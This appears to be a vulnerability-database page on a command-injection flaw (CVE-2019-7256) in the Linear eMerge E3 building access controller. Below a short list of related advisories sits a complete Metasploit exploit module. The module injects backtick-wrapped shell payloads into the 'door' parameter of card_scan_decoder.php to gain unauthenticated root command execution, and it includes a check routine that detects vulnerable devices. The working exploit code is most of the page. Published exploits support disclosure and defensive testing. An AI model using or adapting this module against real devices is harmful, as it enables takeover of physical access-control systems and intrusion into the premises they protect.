Linear eMerge E3 Access Controller Command Injection vulnerability. Unsantized exec() PHP function allows for arbitrary command execution with root privileges.
Reporter | Title | Published | Views | Family All 34 |
---|---|---|---|---|
exploitpack | Linear eMerge E3 1.00-06 - Remote Code Execution | 13 Nov 201900:00 | – | exploitpack |
exploitpack | eMerge E3 1.00-06 - Remote Code Execution | 12 Nov 201900:00 | – | exploitpack |
Exploit DB | Linear eMerge E3 1.00-06 - Remote Code Execution | 13 Nov 201900:00 | – | exploitdb |
Exploit DB | eMerge E3 1.00-06 - Remote Code Execution | 12 Nov 201900:00 | – | exploitdb |
Exploit DB | eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit) | 12 Nov 201900:00 | – | exploitdb |
Prion | Command injection | 2 Jul 201919:15 | – | prion |
Prion | Design/Logic Flaw | 25 Aug 202223:15 | – | prion |
CVE | CVE-2019-7256 | 2 Jul 201919:15 | – | cve |
CVE | CVE-2022-31499 | 25 Aug 202223:15 | – | cve |
Tenable Nessus | Linear eMerge Code RCE (CVE-2019-7256) | 29 Mar 202400:00 | – | nessus |
`#
# Nortek Linear eMerge E3 Unauthenticated Remote Root Code Execution (Metasploit)
# by Gjoko 'LiquidWorm' Krstic
# Affected version: <=1.00-06
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Tested on: GNU/Linux 3.14.54 (ARMv7 rev 10), Lighttpd 1.4.40, PHP/5.6.23
#
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Linear eMerge E3 Access Controller Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in the Linear eMerge
E3 Access Controller. The issue is triggered by an unsanitized exec() PHP
function allowing arbitrary command execution with root privileges.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gjoko Krstic <[email protected]> ' # Discovery, Exploit, MSF Module
],
'References' =>
[
[ 'URL', 'https://applied-risk.com/labs/advisories' ],
[ 'URL', 'https://www.nortekcontrol.com' ],
[ 'CVE', '2019-7256']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [ ['Linear eMerge E3', { }], ],
'DisclosureDate' => "Oct 29 2019",
'DefaultTarget' => 0
)
)
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "card_scan_decoder.php"),
'vars_get' =>
{
'No' => '251',
'door' => '1337'
}
})
if res.code == 200 and res.to_s =~ /PHP\/5.6.23/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def http_send_command(cmd)
uri = normalize_uri(target_uri.path.to_s, "card_scan_decoder.php")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'No' => '251',
'door' => "`"+cmd+"`"
}
})
unless res
fail_with(Failure::Unknown, 'Exploit failed!')
end
res
end
def exploit
http_send_command(payload.encoded)
print_status("Sending #{payload.encoded.length} byte payload...")
end
end
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo